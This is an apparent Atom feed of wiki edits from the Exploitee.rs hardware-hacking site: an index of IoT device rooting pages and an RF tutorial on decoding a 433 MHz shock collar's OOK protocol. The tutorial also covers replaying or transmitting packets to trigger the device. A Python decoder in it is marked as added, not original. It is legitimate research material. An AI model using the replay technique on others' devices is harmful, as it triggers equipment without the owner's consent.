https://www.Exploitee.rs/api.php?action=feedcontributions&user=Rjmendez&feedformat=atomExploitee.rs - User contributions [en]2024-03-28T08:44:03ZUser contributionsMediaWiki 1.37.2https://www.Exploitee.rs/index.php?title=File:Collar_protocol_packet.PNG&diff=2978File:Collar protocol packet.PNG2018-08-21T03:28:50Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Collar protocol packet.PNG&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=Main_Page/Devices&diff=2938Main Page/Devices2017-12-12T17:45:48Z<p>Rjmendez: </p>
<hr />
<div>{| style="border: 0px solid #000000; cell-padding:0px; cell-spacing:0px;"<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''INTERNET OF THINGS'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''BLU-RAY PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Sony-bdp-s5100-multi-region-blu-ray-dvd-player.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony BDP-S5100'''<br />
*[[Sony BDP-S5100]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:LG_BP350.JPG|130px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LG Blu-Ray'''<br />
*[[LG BP350]]<br />
*[[LG BP530]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Panasonic-DMP-BDT230.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Panasonic Blu-Ray'''<br />
*[[DMP-BDT230]]<br />
*[[DMP-BD871]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''CAMERAS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Alarm.com_ADC-v520IR.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Alarm.com v520IR'''<br />
*[[Alarm.com ADC-v520IR]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:DLINK_936L.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''DLink 936L'''<br />
*[[DLink 936L]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Cloudipcam_store.png|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LeFun Cloud IPCam'''<br />
*[[LeFun Cloud IPCam]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Ring-doorbell.jpg|35px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Ring Doorbell'''<br />
*[[Ring Doorbell]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Samsung-SDR3102N.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung SDR-3102N'''<br />
*[[Samsung SDR-3102N]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Samsung-smartcam.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung SmartCam'''<br />
*[[Samsung SmartCam]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Summer_Baby_Zoom_WiFi.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Summer Baby Zoom WiFi'''<br />
*[[Summer Baby Zoom WiFi]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Zmodo greet.JPG|35px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Zmodo Greet'''<br />
*[[Zmodo Greet]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''HOME AUTOMATION'''<br />
| style="border-top: 0px solid #000000;"|[[File:BelkinWemo.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Belkin Wemo'''<br />
*[[Belkin Wemo]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:GreenwaveRealityTCPConnectedHub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Greenwave Reality Bulbs'''<br />
*[[Greenwave Reality Bulbs]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Lutron LBDG2WH Caseta Smart Home Stock.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Lutron L-BDG2-WH Caseta Smart Bridge '''<br />
*[[Lutron L-BDG2-WH Caseta Smart Bridge]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Staples_Connect_Hub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Staples Connect Hub'''<br />
*[[Staples Connect Hub]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:WinkHub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Wink Hub'''<br />
*[[Wink Hub]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MEDIA PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:FireTVStickStockPhoto.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon Fire TV Stick'''<br />
*[[Amazon Fire TV Stick]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:AmazonFireTV.jpg|100px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon FireTV'''<br />
*[[Amazon FireTV]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:VizioCoStarLT.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio CoStar LT (ISV-B11)'''<br />
*[[Vizio CoStar LT (ISV-B11)]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:NetgearPush2TV.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear Push2TV (PTV3000)'''<br />
*[[Netgear Push2TV (PTV3000)]]<br />
|}<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;" valign="top"<br />
|+'''INTERNET OF THINGS (Cont)'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
| style="border-top: 0px solid #000000;"|[[File:NetgearNeoTV.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear NTV200-100NAS'''<br />
*[[Netgear NTV200-100NAS]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Front-SMALL.jpg|100px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Boxee Box'''<br />
*[[Boxee]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Chromecast-stock.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google Chromecast'''<br />
*[[Google Chromecast]] <br />
*[http://forum.exploitee.rs/google-chromecast-f48 Chromecast forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Roku-pile.jpg|100px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Roku Streaming Players'''<br />
*[[Roku]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Allsharecast.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung Allshare Cast'''<br />
*[[Samsung Allshare Cast]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Steam_Link_Stock.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Steam Link'''<br />
*[[Steam Link]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Vudu Spark Stock Photo.jpeg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vudu Spark'''<br />
*[[Vudu Spark]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MOBILE'''<br />
| style="border-top: 0px solid #000000;"|[[File:Razr.png|40px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Moto LTE RAZR, BIONIC, & DROID 4'''<br />
*[[Moto RAZR, BIONIC, DROID 4]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MUSIC PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:ALURATEK_WIFI_RADIO.JPG|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Aluratek WiFi Radio'''<br />
*[[Aluratek WiFi Radio]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Amazon Tap Stock Photo.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon Tap'''<br />
*[[Amazon Tap]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''NETWORK ATTACHED STORAGE'''<br />
| style="border-top: 0px solid #000000;"|[[File:ConnectedDataFileTransporter.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Connected Data Transporter'''<br />
*[[Connected Data Transporter]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Pogoplug-mobile.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''PogoPlug Mobile'''<br />
*[[PogoPlug Mobile]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Qnap TS131.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''QNAP TurboStation'''<br />
*[[QNAP TS-131]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Wd_stock_photo.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Western Digital MyCloud'''<br />
*[[Western Digital MyCloud]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''PRINTERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:EpsonArtisan700.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Epson Artisan 700/800'''<br />
*[[Epson Artisan 700/800]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''REFRIGERATOR'''<br />
| style="border-top: 0px solid #000000;"|[[File:LFX31995ST.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LG Smart Refrigerator (LFX31995ST)'''<br />
*[[LG Smart Refrigerator (LFX31995ST)]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''TELEVISIONS'''<br />
| style="border-top: 0px solid #000000;"|[[File:HisenseAndroidTV.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Hisense Android TV'''<br />
*[[Hisense Android TV]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Vizio_SmartTV_VF553XVT.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio Smart TV (VF553XVT)'''<br />
*[[Vizio Smart TV (VF553XVT)]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''THERMOSTATS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Nest.jpg|80px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google Nest'''<br />
*[[Nest]] <br />
*[http://forum.exploitee.rs/google-nest-f50/ Google Nest Forum ]<br />
*[[Exploiting Nest Thermostats]]<br />
|}<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''INTERNET OF THINGS (Cont)'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''VOIP'''<br />
| style="border-top: 0px solid #000000;"|[[File:Ooma_Telo.jpg|80px]] <br />
| valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Ooma Telo'''<br />
*[[Ooma Telo]] <br />
|}<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Medical'''<br />
| style="border-top: 0px solid #000000;"| [[File:Merlin-at-home-1.jpg|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''SJM Merlin at Home'''<br />
*[[SJM Merlin at Home]]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Networking'''<br />
| style="border-top: 0px solid #000000;"| [[File:BELKIN_N300.JPG|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Belkin N300'''<br />
*[[Belkin N300]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:Google_OnHub.jpg|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google (TP-Link)'''<br />
*[[Google OnHub (TP-Link)]]<br />
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:ASUS-Google-OnHub.jpg|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google (ASUS)'''<br />
*[[Asus OnHub]]<br />
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:LINKSYS_WRT1200AC.JPG|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Linksys WRT1200AC'''<br />
*[[Linksys WRT1200AC]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:NETGEAR_WN3000RP.JPG|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear WN3000RP'''<br />
*[[Netgear WN3000RP]]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Android TV'''<br />
| style="border-top: 0px solid #000000;"| [[File:Android_TV.jpg|100px]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''ADT-1'''<br />
*[[ADT-1 Android TV]]<br />
*[https://forum.exploitee.rs/adt-f52/ ADT-1 Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Google-Nexus-Player-Stock.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Nexus Player'''<br />
*[[Google Nexus Player]] <br />
*[https://forum.exploitee.rs/nexus-player-f54/ Google Nexus Player Forum ]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px;" valign="top"<br />
|+'''SECOND GENERATION GOOGLETV'''<br />
| style="border-top: 0px solid #000000;"|[[File:Asus_cube.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Asus Cube'''<br />
*[[Asus Cube]] <br />
*[http://forum.exploitee.rs/cube-f46/ Asus Cube Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Neotv-prime.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear NeoTV Prime'''<br />
*[[Netgear NeoTV Prime]] <br />
*[http://forum.exploitee.rs/neotv-prime-gtv100-f44/ Netgear NeoTV Prime Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Hisense pulse stock.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Hisense Pulse'''<br />
*[[Hisense Pulse]] <br />
*[http://forum.exploitee.rs/pulse-gx1200v-f42/ Hisense Pulse Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:180px-NSZ-GS7.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony NSZ-GS7'''<br />
*[[Sony NSZ-GS7 (Streamer)]] <br />
*[http://forum.exploitee.rs/nsz-gs7-streamer/ NSZ-GS7 Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Costar01.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio Co-Star'''<br />
*[[Vizio Co-Star]] <br />
*[http://forum.exploitee.rs/star-vap430-f40/ Co-Star Forum ]<br />
|-<br />
| [[File:180px-LG_G2.jpg|150px]]<br />
| colspan="2" valign="top" style="text-align: left;"|<br />
'''LG 47G2/55G2'''<br />
*[[LG 47G2/55G2 (Internet TV)]] <br />
*[http://forum.exploitee.rs/47g2-55g2-internet-f36/ LG devices forum ]<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px"<br />
|+'''FIRST GENERATION GOOGLETV'''<br />
| style="border-top: 0px solid #000000;"| [[File:180px-revue.jpg|100px]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Logitech Revue'''<br />
*[[Revue software root]]<br />
*[[Logitech Revue UART root]]<br />
*[http://forum.exploitee.rs/revue/ Revue forum ]<br />
*[http://exploitee.rs/index.php/Category:Logitech_Revue Info on Logitech Revue]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:180px-Sony_NSZ_GT1_NSX_40GT1.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony NSZ-GT1'''<br />
*[[Sony NSZ-GT1 (Bluray Player)]] <br />
*[http://forum.exploitee.rs/nsz-gt1/ NSZ-GT1 Forum ]<br />
'''Sony NSX-##GT1'''<br />
*[[Sony NSX-40GT1 (Internet TV)]]<br />
*[http://forum.exploitee.rs/nsx-40gt1/ NSX-40GT1 Forum ]<br />
''' Sony Generic'''<br />
*[[Sony Bootloader HW Root]]<br />
*[[Sony Unsigned Kernels (SW Root)]]<br />
*[[Sony SATA HW Root]]<br />
*[[I've rooted... now what?!]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Exploitee.rs Hardware'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[[Exploitee.rs Low Voltage e-MMC Adapter]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Generic Info'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[[All_device_feature_matrix|All Device Feature Matrix]]<br />
*[[Exploiting Key Signing for Root]]<br />
*[[Installing Custom Recovery (Gen 2 Only)]]<br />
*[[RF_Signal_Analysis|RF Signal Analysis]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Presentation Slides'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON20.pdf DEF CON 20 - "Hacking The Google TV"]<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON21.pdf DEF CON 21 - "Google TV Or: How I Learned to Stop Worrying and Exploit Secure Boot"]<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON22.pdf DEF CON 22 - "Hack All The Things: 20 Devices in 45 Minutes"]<br />
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader.pdf BlackHat 2017 - "Hacking Hardware with a $10 SD Card Reader"]<br />
*[https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf DEFCON 25 - "All Your Things Are Belong To Us"]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Whitepapers'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader-wp.pdf "Hacking Hardware with a $10 SD Card Reader"]<br />
|}<br />
|}</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2928RF Signal Analysis2017-10-18T20:50:12Z<p>Rjmendez: /* Sending our own data */</p>
<hr />
<div>This page covers some basic RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use sub-1 GHz signaling for various functions (sensors, remote controls, device-to-device communication) with an undocumented and sometimes proprietary protocol. These can be difficult to understand without documentation, and the aim here is to provide some of the first steps needed to identify and decode the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the RTL-SDR blog, for sale on Amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is the FCC documentation for the transmitting device: if the device has an FCC ID then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device for now will be an alarm remote control with the FCC ID "B4Z-RF400401"; the frequency is not listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (Linux and Mac, http://gqrx.dk/) or SDR# (Windows, http://airspy.com/download/) in a higher sample rate mode, to inspect the entire band the device operates on and look for the signal. For the rest of the demo I will be using another device with no FCC ID. It advertises that it operates at 433 MHz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now, but the waveform isn't showing me very much. Listening to the demodulated audio does tell me something, however: this sounds like Amplitude Shift Keying (ASK), also known as On-Off Keying (OOK). Let's verify this with GNU Radio and gr-fosphor over the HackRF for a somewhat higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate; a favorite tool for this is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the distinct bits here and get a general idea of the baud rate; it looks like it is above 3500 baud, but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh), which takes a lot of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second, we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000; this isn't accurate because of the rest of the tinkering, but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per bit, or 3600 baud. At this point we can retransmit these bits with the HackRF and trigger the device, but it doesn't give us a clear idea of what is actually going on.<br />
<br />
The pattern of bits looks like there is some error correction built in: a sequence of 1000 seems to equal a 0 and 1110 equals a 1. URH will let us decode this further, as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10, we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring, the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
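The bit-slicing and symbol-decoding steps above (samples per bit to baud, the 1000/1110 chip patterns, and noisy packets that match neither pattern), as an added Python example that is not part of the original page or the author's ShockCollar code. It works on a constructed magnitude envelope rather than a real capture, and the threshold, minimum-run and rising-edge alignment choices are assumptions, not what URH does internally.<br />

```python
"""OOK bit slicing and symbol decoding, following the steps the page walks through."""
from typing import List, Tuple

SAMPLE_RATE = 2_000_000          # 2 Msps, the RTL-SDR capture rate used on the page
# Chip patterns observed on the page: 1000 -> data bit 0, 1110 -> data bit 1
CHIP_SYMBOLS = {"1000": "0", "1110": "1"}
CHIPS_PER_BIT = 4


def baud_from_samples_per_chip(sample_rate: int, samples_per_chip: int) -> float:
    """Chip rate (URH's 'bit length') from the sample rate and samples per chip."""
    return sample_rate / samples_per_chip


def threshold(envelope: List[float], level: float = 0.5) -> List[int]:
    """Turn a magnitude envelope into a 0/1 stream (the 'noise level' knob in URH).
    The 0.5 level is an assumption for the constructed signal below."""
    return [1 if s > level else 0 for s in envelope]


def run_lengths(stream: List[int]) -> List[Tuple[int, int]]:
    """Collapse the 0/1 stream into (value, length) runs."""
    runs: List[Tuple[int, int]] = []
    for s in stream:
        if runs and runs[-1][0] == s:
            runs[-1] = (s, runs[-1][1] + 1)
        else:
            runs.append((s, 1))
    return runs


def estimate_samples_per_chip(stream: List[int], min_run: int = 8) -> int:
    """The shortest pulse in the capture approximates one chip; runs shorter than
    min_run samples are treated as glitches and ignored (assumed heuristic)."""
    candidates = [n for _, n in run_lengths(stream) if n >= min_run]
    if not candidates:
        raise ValueError("no pulses found above the noise floor")
    return min(candidates)


def slice_chips(stream: List[int], samples_per_chip: int) -> str:
    """Majority-vote each chip period into a single '0' or '1' chip."""
    chips = []
    for start in range(0, len(stream) - samples_per_chip + 1, samples_per_chip):
        window = stream[start:start + samples_per_chip]
        chips.append("1" if sum(window) * 2 > len(window) else "0")
    return "".join(chips)


def decode_chips(chips: str) -> str:
    """Map each 4-chip group to a data bit; groups matching neither pattern
    (like the noisy packets 5 and 10 on the page) are reported as '?'."""
    return "".join(
        CHIP_SYMBOLS.get(chips[i:i + CHIPS_PER_BIT], "?")
        for i in range(0, len(chips) - CHIPS_PER_BIT + 1, CHIPS_PER_BIT)
    )


def decode_capture(envelope: List[float], sample_rate: int = SAMPLE_RATE):
    """Full chain: threshold -> estimate chip length -> slice -> decode.
    Returns (samples_per_chip, chip_baud, decoded_bits)."""
    stream = threshold(envelope)
    if 1 not in stream:
        raise ValueError("capture contains no signal above the threshold")
    spc = estimate_samples_per_chip(stream)
    # Both symbols start with a '1' chip, so align slicing to the first rising edge.
    first_edge = stream.index(1)
    chips = slice_chips(stream[first_edge:], spc)
    return spc, baud_from_samples_per_chip(sample_rate, spc), decode_chips(chips)


def make_envelope(chips: str, samples_per_chip: int, silence: int = 1000) -> List[float]:
    """Constructed test signal (not a real capture): leading silence followed by a
    clean OOK envelope carrying `chips`."""
    body = [(0.9 if c == "1" else 0.1) for c in chips for _ in range(samples_per_chip)]
    return [0.1] * silence + body


if __name__ == "__main__":
    # 24 chips = 6 data bits at the page's 555 samples per chip
    print(decode_capture(make_envelope("100011101000111011101000", 555)))
```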
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here: https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=LeFun_Cloud_IPCam&diff=2873LeFun Cloud IPCam2017-08-09T19:22:22Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Cloudipcam_store.png|100px|left|thumb]]<br />
[[Category:Cameras]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.<br />
<br />
== About ==<br />
